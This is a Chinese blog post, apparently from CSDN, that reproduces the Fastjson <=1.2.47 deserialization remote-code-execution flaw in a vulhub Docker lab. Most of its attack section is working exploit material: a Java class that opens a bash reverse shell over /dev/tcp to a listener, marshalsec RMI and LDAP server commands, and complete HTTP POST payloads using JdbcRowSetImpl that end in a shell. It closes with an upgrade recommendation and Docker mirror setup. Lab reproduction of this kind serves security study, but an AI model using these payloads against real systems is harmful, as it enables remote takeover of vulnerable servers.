c++ 检查远程主机端口_Fastjson<=1.2.47版本远程代码执行漏洞复现

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量223 收藏
点赞数
文章标签: c++ 检查远程主机端口 fastjson版本 fastjson版本查看 maven 指定java版本 ubuntu java降低版本

一、漏洞介绍

0x01 fastjson介绍

          Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。它可以解析 JSON 格式的字符串,支持将 Java Bean序列化为JSON字符串,也可以从 JSON 字符串反序列化 Java Bean。

0x02 漏洞介绍

         Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type"指定反序列化的类型。并且Fastjson自定义的反序列化机制会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者就可以构造恶意数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,如果指定类的指定方法中有可以被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

二、影响范围

Fastjson < =1.2.47

三、漏洞复现

0x01 攻击过程讲解

(1):攻击示意图

2645fadf40bc5a561199086806ea355e.png

主机A(Ubuntu):存在fastjson反序列化漏洞的主机
主机C(kali2018):开启RMI/LDAP服务
主机B(kali2018):编译生成Exploit.class文件,也就是构造的恶意类(包含要执行的命令)

       说明:整改攻击过程需要三台主机,本人在测试过程中,使用Ubuntu作为主机A,使用kali2018这台主机的不同端口来作为主机B和主机C。

(1):攻击流程

①:攻击者使用payload攻击主机A(该payload需要指定rmi/ldap地址)

②:主机A引发反序列化漏洞,发送了进行rmi远程发放调用,去连接主机C

③:主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi服务最终加载并执行主机B的恶意java类

④:主机A引发恶意系统命令执行

0x02环境搭建

使用docker搭建环境。(如果本地搭建docker下载镜像太慢,可以看文章后面有解决方法)

(1):切换到fastjson

cd vulhub/fastjson/1.2.47-rce/

a0c87db4640079656c6efce499e73fdc.png

(2):启动docker环境

docker-compose up -d

99ad5fc2a3ae9c53e154bd75b85f4e6b.png

(3):访问目标端口

e5ae971c8650ea893c23668e60e8fc38.png

fastjson搭建成功。

0x03 漏洞复现

(1):判断目标站点使用fastjson(有回显)

{"name":"bob","age":"18"

使用POST请求发送数据包,并且不闭合{}。

9592d59caebccfc55d26a9633537cb9e.png

(2):判断目标站点使用fastjson(无回显)

{          "zeo":{"            @type":"java.net.Inet4Address",      "val":"生成的dnslog"          }}

d3dc5f7d7bb80375123c80b078396f05.png

         本来可以通过dnslog的流量可以判断目标站点是不是使用了fastjson,但是这块不太明白为什么在dnslog上没有收到流量,好在返回包中发现了fastjson的版本。

(3):创建Exploit.java文件

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "exec 5<>/dev/tcp/xx.xx.xx.xx/port;cat  while read line; do= $line 2>&5 >&5; done"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));        String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }        p.waitFor();        is.close();        reader.close();        p.destroy();    }    public static void main(String[] args) throws Exception {    }}

a6e85e761dd50b11518941430ec541a9.png

注意:文件名称必须命名为Exploit.java,不然会报错,上面的IP和地址写的是接收反弹shell的IP和地址。

(4):编译Exploit.java文件为Exploit.java文件

javac Exploit.java

bd16657d4a654858a50e25b2408112ff.png

执行完成上述命令之后,会生成一个Exploit.class文件。

(5):启动web服务

python2 -m SimpleHTTPServer 8080python3 -m http.server 8080

         上面两种方式启动临时的HTTP服务,HTTP服务必须要在Exploit.class文件所在的目录启动,这样才可以下载Exploit.class文件。

5c05192ae7ea1cf0b5af690517057937.png

(6):下载marshalsec(目的是后面开启LDAP服务)

下载链接:https://github.com/mbechler/marshalsec

使用marshalsec项目是为了启动一个 RMI 服务器,监听端口并制定加载远程类。

b272645de2d149b009ebd3ee4a1636ce.png

(7):配置mvn(kali下)

①:下载mvn

wget https://archive.apache.org/dist/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz

b356bc8168848e0dd4918fcae5d53700.png

②:创建解压目录

mkdir /usr/local/maven

8437b96202c00db0bb0aa7f64a53bab5.png

③:解压到指定目录

tar -zxvf apache-maven-3.5.4-bin.tar.gz -C /usr/local/maven/

22fdf7e749f030b2e45b1ef1613fa44d.png

④:配置环境变量

leafpad /etc/profile#添加如下内容MAVEN_HOME=/usr/local/maven/apache-maven-3.5.4PATH=$MAVEN_HOME/bin:$PATHexport MAVEN_HOME PATH

620d64f906f0506b35466f9701fda3b0.png

⑤:使配置生效

source /etc/profile

b3c2a1812ce901591e391065e1521cd1.png

⑥:查看mvn版本

mvn -v

0ed7ea6f9744ea76e0b346558cf047b7.png

(8):编译marshalsec

cd marshalsec-mastermvn clean package -DskipTests

910b8f407c59f5e1079f4d78f3bdf42f.png

4db8e25852f700026ac17b0c61dfc939.png

(9):开启远程方法调用

cd targetjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.223.160:8080/#Exploit" 9999

1eb283b239dda53a9f78803ebf7876a2.png

(10):Dnslog接收流量

POST / HTTP/1.1Host: 192.168.223.175:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 260{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://dnslog/Exploit",        "autoCommit":true    }}

c85d17be0a4f90fae09dd7731900fd80.png

查看dnslog平台上的流量,发现收到流量。

e3c161d1b1b23eaecaa50a82ee0c5ec0.png

(11):反弹shell

使用环境:

目标主机(Ubuntu:192.168.223.175):存在fastjson漏洞

         RMI主机(kali2018:192.168.223.160):使用该主机的两个端口,一个8080端口开启服务,使该主机可以访问到Exploit.class这个文件,一个9999端口,是marshalsec开启的RMI或者LDAP的端口

  接收shell的主机(kali2019:192.168.223.138):该主机的IP及4444端口被写进了Exploit.java文件中并被编译成了Exploit.class文件,因此使用该主机监听4444端口,就可以接收到shell

  • RMI方式

①:监听主机监听4444端口

45a356f2f7ff002e22929a64eccdd125.png

②:开启远程方法调用

cd targetjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.223.160:8080/#Exploit" 9999

1eb283b239dda53a9f78803ebf7876a2.png

③:发送payload

POST / HTTP/1.1Host: 192.168.223.175:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 265{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://192.168.223.160:9999/Exploit",        "autoCommit":true    }}

5c88be026a00df4150a5cdcc066bc66e.png

④:成功getshell

12af917f307dcf2d77368b6bb9c74c55.png

  • LDAP方式

①:监听主机监听4444端口

5a2055decc57527730407d9ad69da1a4.png

②:开启远程方法调用

cd targetjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.223.160:8080/#Exploit" 9999

5ef0166b3af89978ac6d09859a25ae57.png

③:发送payload

POST / HTTP/1.1Host: 192.168.223.175:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 265{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"ldap://192.168.223.160:9999/Exploit",        "autoCommit":true    }}

19339d08af413356b13e6b4f25e2c106.png

④:成功getshell

15271ef7ccd3ed1a4d8d1faf2dd05aef.png

0x04 复现总结

       Fastjson漏洞的复现比较复杂,加上反弹shell的主机一共涉及了三台主机,下面将该漏洞复现的过程简要说明一下:

(1):使用docker在一台Ubuntu上搭建fastjson漏洞环境

(2):在kali2018上创建Exploit.java文件并编译成Exploit.class文件

(3):在kali2018上开启一个临时服务,目的是可以远程加载生成的Exploit.class这个文件

(4):在kali2018上使用marshalsec开启远程方法调用

(5):在kali2019上进行监听(在Exploit.java中的反弹shell的地址是kali2019的地址)

(6):访问Ubuntu上的漏洞环境并构造数据包

(7):成功getshell

四、修复建议

0x01 升级到 1.2.48版本及以上

五、解决docker下载镜像失败问题

0x01 docker安装国内源

编辑/etc/docker/daemon.json这个文件,如果没有这个文件就创建一个文件。

vi /etc/docker/daemon.json#添加如下网易镜像源{"registry-mirrors": ["http://hub-mirror.c.163.com"]}

即使使用了国内源,有可能也无法快速的下载相关的镜像。因此可以使用阿里云加速器。

0x02 docker安装加速器

(1):注册或登录阿里云

https://cn.aliyun.com/

(2):进入控制台

994bcb4b91372bc3622af8edf48adca7.png

(3):搜索镜像容器服务

06cf3cb8969f2ccddd4117a735ff237b.png

(4):查看镜像加速器

c89a5360ad2c7b5ddff0bb07f0cc8918.png

(5):修改本地文件

vim /etc/docker/daemon.json

c889afc12559a11e53883076d84ab01c.png

(6):重启docker加速器

systemctl daemon-reload

2765424151bb8c4a5e8dd17cf002b944.png

(7):重启docker服务

systemctl restart docker

0e6768891bb1ca1657283df158271d3d.png

参考链接:https://blog.csdn.net/god_zzZ/article/details/107122487

0c30db4b6bdad0e55d259d416db45325.png

weixin_39859061
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
fastjson版本低于1.2.47出现的远程代码漏洞解决方案。
Fastjson 1.2.47 远程命令执行漏洞
m0_63241485的博客
08-17 1220
astjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。...
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
最新发布
小司机的奥拓
04-23 2364
复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是javajavac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
fastjson 1.2.47 远程命令执行漏洞
weixin_42786460的博客
10-14 514
fastjson 1.2.47 远程命令执行漏洞
Fastjson-1.2.47远程命令执行漏洞(标明坑位)
晚安這個未知的世界
09-21 1164
前言 最近一直想复现这个漏洞,但是一直没时间,也没怎么在网上找到真的有用的文章,太多水文了,10篇文章有9篇都是一模一样的copy,还有一篇就只copy了一半,另一半就不搞了,真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的sett
Fastjson 1.2.47 远程命令执行漏洞复现记录分享
qq_35361412的博客
07-16 932
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
然而,Fastjson 1.2.69 版本存在一个严重的反序列化远程代码执行漏洞,这使得攻击者有可能通过精心构造的输入数据,绕过防御机制,执行任意远程代码,对服务器的安全构成重大威胁。 **漏洞原理** Fastjson 在处理 ...
JavafastJSON的使用
weixin_30633507的博客
04-23 277
本文整理下fastJSON的简单使用,个人总结用,高手及大神不必在本文浪费时间(与csdn同步) fastJSON的使用说到底就是JSON对象、bean对象、字符串类型,三者之间的相互转化, ​ String→bean :parseObject(String text, Class&lt;T> clazz); // 把JSON文本parse为bean; bean→String...
Fastjson命令执行漏洞复现2(fastjson <=1.2.47
szgyunyun的博客
06-29 927
一、搭建环境: https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce 提供的漏洞环境死活没复现出来只好自己搭建个环境了。 1、搭建tomcat环境 首先去tomcat官网下载tomcat https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.48/bin/apache-tomcat-9.0.48.tar.gz 2、将此压缩包复制到我的linux服务器上解压
c/c++ 解析JSON数据
05-05
用C语言解析和组装JSON数据(string或从文件读取): ,并且能取某个item值 。 我在vs2010上运行成功,附件为整个工程 。 (注:如果工程有编译上的error之类的,像fopen、fprintf: 可以修改: 选项Project | Configuration Properties | C/C++ | Preprocessor | Preprocessor Definitions 添加_CRT_SECURE_NO_DEPRECATE和_SCL_SECURE_NO_DEPRECATE )
C++解析json
sinat_31608641的博客
08-06 1536
解析json
c++运行不出结果_fastjson 不出网利用总结
weixin_26705191的博客
01-10 2168
点击蓝字关注我们声明本文作者:flashine本文字数:2382阅读时长:20分钟附件/链接:点击查看原文下载声明:请勿用作违法用途,否则后果自负本文属于WgpSec原创奖励计划,未经许可禁止转载前言之前做项目在内网测到了一个fastjson反序列化漏洞,使用dnslog可以获取到ip,但是通过burp请求在vps搭建的rmi服务时发现rmi服务监听的端口有收到请求,但...
fastjson 使用
IT民工的博客
07-06 1180
package org.apache.qpid.contrib.test;import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.Map;import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObj
fastJson解析
费..的博客
11-25 992
fastJson解析一个json对象 注意:json导的包是alibaba的,可在网上下载fastjson…jar包,然后放在工程libs文件夹里,然后导入import com.alibaba.fastjson.JSONObject;public void fastJsonTest() throws IOException{ //从工程的assets文件夹得到一个文件的流,文件里
fastjson1.2.24-rce)
不知名白帽的博客
06-19 1982
fastjson autotype在处理json对象的时候没有对@type字段进行安全性验证,导致攻击者传入危险类,并调用危险类连接远程主机,通过恶意类执行代码
windows系统如何查看端口被占用、杀进程
GSON的博客
09-06 413
最近写项目,总是出现端口被占用的问题,原来傻傻的把电脑重启一下,终于有一天受不了了,想要想办法解决。刚开始从网上找了好多教程,发现不行。开始自己尝试,终于,成功的将占用端口的进程杀掉。在此记录下过程(以8080端口为例): 1、输入netstat -ano然后回车,就可以看到系统当前所有的端口使用情况。 netstat -ano 2、根据端口号查找对应的进程号 netstat -ano | findstr 80 发现 8080 端口被 PID(进程号)为 9268 的进程占用。.
FastJSON应用前测试
weixin_34055787的博客
11-23 114
FastJSON 应用前测试   FastJSON是一个很好的java开源json工具类库,相比其他同类的json类库,它的速度的确是fast,最快!但是文档做得不好,在应用前不得不亲测一些功能。   实际上其他的json处理工具都和它差不多,api也有几分相似。   一、JSON规范 JSON是一个标准规范,用于数据交互,规范的中文文档如下: http://www.json.or...
fastjson&lt; 1.2.69远程代码执行漏洞cve编号
01-04
fastjson远程代码执行漏洞的CVE编号是CVE-2021-21351。该漏洞源于fastjson在处理JSON数据时存在安全漏洞,攻击者可以通过精心构造的JSON数据来实现远程代码执行,从而对系统进行攻击。 漏洞的产生主要是由于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值